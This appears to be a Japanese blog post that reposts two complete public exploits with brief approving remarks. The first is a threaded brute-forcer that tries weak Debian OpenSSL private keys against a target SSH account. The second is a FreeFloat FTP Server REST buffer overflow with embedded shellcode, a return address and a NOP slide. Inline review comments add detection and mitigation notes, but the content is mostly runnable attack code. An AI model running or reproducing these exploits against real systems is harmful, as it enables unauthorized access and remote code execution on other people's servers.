新しいソース
#!/bin/python
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
############################################################################
# Author: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
# 1. Download http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
#
# 2. Extract it to a directory
#
# 3. Execute the python script
#    - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
#    - execute: python exploit.py (without parameters) to display the help
#    - if the key is found, the script shows something like that:
#      Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
#      Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
############################################################################
#
# NOTE(review): Python 2 script (print statements, the Queue module,
# os.popen3).  It walks a directory of pre-generated private keys and tries
# each one against a single account with the system ssh client.  On the
# server, every unsuccessful attempt should surface as a failed public-key
# authentication for that account, arriving in a burst from one source with
# no pause between tries -- that pattern, not any single connection, is what
# to alert on.  Mitigation is replacing any key that appears in the
# downloaded key set and rate-limiting authentication failures per source.
import Queue
import os
import string   # NOTE(review): imported but never used below
import time
from threading import Thread
import sys


# Shared stop flag: a single boolean that becomes True once some worker
# thread has found a working key.  Plain attribute, no lock; the only write
# is one attribute assignment in Finish().
class End():
    def __init__(self):
        self.end = False

    def Finish(self):
        self.end = True

    def GetEnd(self):
        return self.end


# Worker thread: one per requested thread, all sharing the same queue of key
# file names and the same End flag.
class Connection(Thread):
    # QueueDir: Queue.Queue of key file names (shared between workers)
    # TheEnd:   shared End flag, set by whichever worker succeeds
    # dir/host/user/port: passed through verbatim onto the ssh command line
    def __init__(self,QueueDir,TheEnd,dir,host,user,port='22'):
        Thread.__init__(self)
        self.QueueDir = QueueDir
        self.TheEnd = TheEnd
        self.dir = dir
        self.host = host
        self.user = user
        self.port = port

    def run(self):
        # Pull key file names off the shared queue until one works or the
        # queue runs dry.  The loop test is not atomic with the blocking
        # get() below: if another worker takes the last item in between,
        # this get() waits forever (no timeout is passed).
        while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
            key = self.QueueDir.get()
            # The ssh command line is built by plain string concatenation and
            # handed to os.popen3, which runs it through /bin/sh.  user, port
            # and host come straight from argv and key from os.listdir(), so
            # shell metacharacters in any of them are interpreted by the shell
            # rather than passed on to ssh.
            cmd = 'ssh -l ' + self.user
            cmd = cmd + ' -p ' + self.port
            # Rule out a password prompt so the exit status reflects the key alone.
            cmd = cmd + ' -o PasswordAuthentication=no'
            cmd = cmd + ' -i ' + self.dir + '/' + key
            # "exit" is the remote command; "echo $?" runs locally afterwards
            # and prints ssh's own exit status, which is all this script reads.
            cmd = cmd + ' ' + self.host + ' exit; echo $?'
            pin,pout,perr = os.popen3(cmd, 'r')
            pin.close()
            # To debug, uncomment the next line. This will show the errors reported by ssh.
            #print perr.read()
            # Exit status 0 means the remote side accepted the key.  Every
            # other status (refused key, unreachable host, any other ssh
            # failure) is treated alike and silently discarded.
            if pout.read().lstrip().rstrip() == '0':
                self.TheEnd.Finish()
                print ''
                print 'Key Found in file: '+ key
                print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host)
                print ''


print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'

# Usage: <dir> <host> <user> [port [threads]].  port and threads are kept as
# strings here; threads is converted with int() at the spawn loop, port is
# concatenated into the ssh command as-is.
if len(sys.argv) < 4:
    print './exploit.py <dir> <host> <user> [[port] [threads]]'
    print ' <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash'
    print ' <host>: The victim host'
    print ' <user>: The user of the victim host'
    print ' [port]: The SSH port of the victim host (default 22)'
    print ' [threads]: Number of threads (default 4) Too big numer is bad'
    sys.exit(1)

dir = sys.argv[1]   # shadows the dir() builtin
host = sys.argv[2]
user = sys.argv[3]
if len(sys.argv) <= 4:
    port='22'
    threads=4
else:
    if len(sys.argv) <=5:
        port=sys.argv[4]
        threads = 4
    else:
        port=sys.argv[4]
        threads = sys.argv[5]

# Every directory entry except *.pub files is queued as a candidate key.  The
# check is a substring test on the name, not a suffix test.
ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()
for i in range(len(ListDir)):
    if ListDir[i].find('.pub') == -1:
        QueueDir.put(ListDir[i])
initsize = QueueDir.qsize()
tested = 0
for i in range(0,int(threads)):
    Connection(QueueDir,TheEnd,dir,host,user,port).start()

# Progress loop: samples the queue every 5 s.  Python 2 integer division, so
# speed is whole keys per second over the last window.
while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
    time.sleep(5)
    actsize = QueueDir.qsize()
    speed = (initsize - tested - actsize)/5
    tested = initsize - actsize
    print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed)

# milw0rm.com [2008-06-01]
||<
これのソースが結構面白そうだから、 最初にどんなソースか読んでみようと思います。
>|python|
#!/usr/bin/python
#
#[+]Exploit Title: FreeFloat FTP Server REST and PASV Buffer Overflow Exploit
#[+]Date: 18\06\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
#[+]Version: 1.00
#[+]Tested On: Windows XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
# NOTE(review): Python 2 script.  On the wire this is an FTP login
# ("USER test" / "PASS test") followed by a REST command whose argument is the
# roughly 400-byte buffer assembled below; a legitimate REST argument is a
# short restart marker, so an FTP REST line of that length is the network
# detection signature.  Server-side, the fix is length-checking the REST
# argument before it is handled.  The return address is hard-coded for the
# "Tested On" build above, which is the only platform this value is
# meaningful for.
#
import errno               # NOTE(review): unused
from os import strerror    # NOTE(review): unused
from socket import *
import sys
from time import sleep
from struct import pack

if len(sys.argv) != 3:
    print "[-]Usage: python %s <ip> <port>" % sys.argv[0]
    print "[-]Exemple: python %s 192.168.1.2 21" % sys.argv[0]
    sys.exit(0)   # exits with status 0 even on a usage error

ip = sys.argv[1]
port = int(sys.argv[2])

# Payload bytes reproduced verbatim from the original listing.  The author's
# own annotations say it is a WinExec "calc" stub and list the byte values it
# must not contain.
shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
             "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
             "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
             "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"  # Shellcode WinExec CALC
             "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"  # Known badchars "\x00\xff\x0d\x0a\x3d\x20"
             "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
             "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
             "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
             "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
             "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
             "\x7f\xe8\x7b\xca")

# Buffer layout: 246 bytes of filler, the 4-byte little-endian address,
# a 20-byte NOP slide, then the payload.
buf = "\x41" * 246
buf += pack('<L',0x7C91FCD8)  # JMP ESP in ntdll.dll (per the author; only valid for the "Tested On" build, where ntdll loads at a fixed base)
buf += "\x90" * 20
buf += shellcode

print "[+]Connecting with server..."
sleep(1)
try:
    s = socket(AF_INET,SOCK_STREAM)
    s.connect((ip,port))
    s.recv(2000)                  # banner and replies are read but never checked
    s.send("USER test\r\n")
    s.recv(2000)
    s.send("PASS test\r\n")
    s.recv(2000)
    s.send("REST "+buf+"\r\n")    # the oversized REST argument
    s.close()
    s = socket(AF_INET,SOCK_STREAM)
    s.connect((ip,port))          # per the author, the server must be connected to again for the crash (the overflow) to occur
    sleep(1)                      # wait a second
    s.close()                     # closing this connection is what crashes the server
    print "[+]Exploit sent with sucess"
except:
    # Bare except: swallows every exception (including KeyboardInterrupt) and
    # reports only the address, so the real cause of a failure is lost.
    print "[*]Error in connection with server: "+ip
これもよさげ。